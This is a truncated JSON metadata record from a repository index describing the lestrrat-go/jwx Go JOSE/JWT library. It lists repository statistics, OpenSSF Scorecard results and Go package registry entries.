{"id":372104,"url":"https://github.com/lestrrat-go/jwx","last_synced_at":"2026-06-13T20:31:32.353Z","repository":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-05-23T12:32:06.000Z","size":17687,"stargazers_count":2382,"open_issues_count":0,"forks_count":190,"subscribers_count":23,"default_branch":"develop/v4","last_synced_at":"2026-05-30T13:57:09.613Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-05-28T02:50:31.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":140,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v4","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33728391,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-05-31T02:00:06.040Z","response_time":95,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"packages":[{"id":14207302,"name":"github.com/lestrrat-go/jwx/v4","ecosystem":"go","description":null,"homepage":null,"licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":30,"first_release_published_at":"2026-04-08T00:22:58.000Z","latest_release_published_at":"2026-05-07T00:58:05.000Z","latest_release_number":"v4.0.2","last_synced_at":"2026-06-12T15:45:31.626Z","created_at":"2026-04-08T08:59:09.394Z","updated_at":"2026-06-12T15:45:31.626Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v4","install_command":"go get github.com/lestrrat-go/jwx/v4","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v4#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-04-08T10:09:09.492Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.185308627431826,"dependent_packages_count":4.858766639562581,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.022037633497203},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v4","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v4","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v4","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v4/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv4/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv4/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv4/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv4/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv4/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv4/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":12564973,"name":"github.com/lestrrat-go/jwX","ecosystem":"go","description":"Package jwx contains tools that deal with the various JWx (JOSE)\ntechnologies such as JWT, JWS, JWE, etc in Go.\n\nThe primary focus of this library tool set is to implement the extremely\nflexible OAuth2 / OpenID Connect protocols. There are many other libraries\nout there that deal with all or parts of these JWx technologies:\n\nThis library exists because there was a need for a toolset that encompasses\nthe whole set of JWx technologies in a highly customizable manner, in one package.\n\nYou can find more high level documentation at Github (https://github.com/lestrrat-go/jwx)","homepage":"https://github.com/lestrrat-go/jwX","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwX","keywords_array":[],"namespace":"github.com/lestrrat-go","versions_count":55,"first_release_published_at":"2019-05-20T02:55:45.000Z","latest_release_published_at":"2025-04-09T10:38:17.000Z","latest_release_number":"v1.2.31","last_synced_at":"2026-06-05T19:03:17.250Z","created_at":"2025-12-08T13:16:28.271Z","updated_at":"2026-06-05T19:03:17.250Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwX","install_command":"go get github.com/lestrrat-go/jwX","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwX#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30931132,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-25T07:55:14.202Z","status":"ssl_error","status_checked_at":"2026-03-25T07:55:10.924Z","response_time":80,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:38.823Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.396516061504722,"dependent_packages_count":5.056894360405712,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.226705210955217},"purl":"pkg:golang/github.com/lestrrat-go/jw%21x","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwX","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwX","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwX/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2FjwX/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2FjwX/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2FjwX/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2FjwX/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2FjwX/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2FjwX/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4260447,"name":"github.com/lestrrat-go/jwx/jwe/internal/cmd/genheader","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"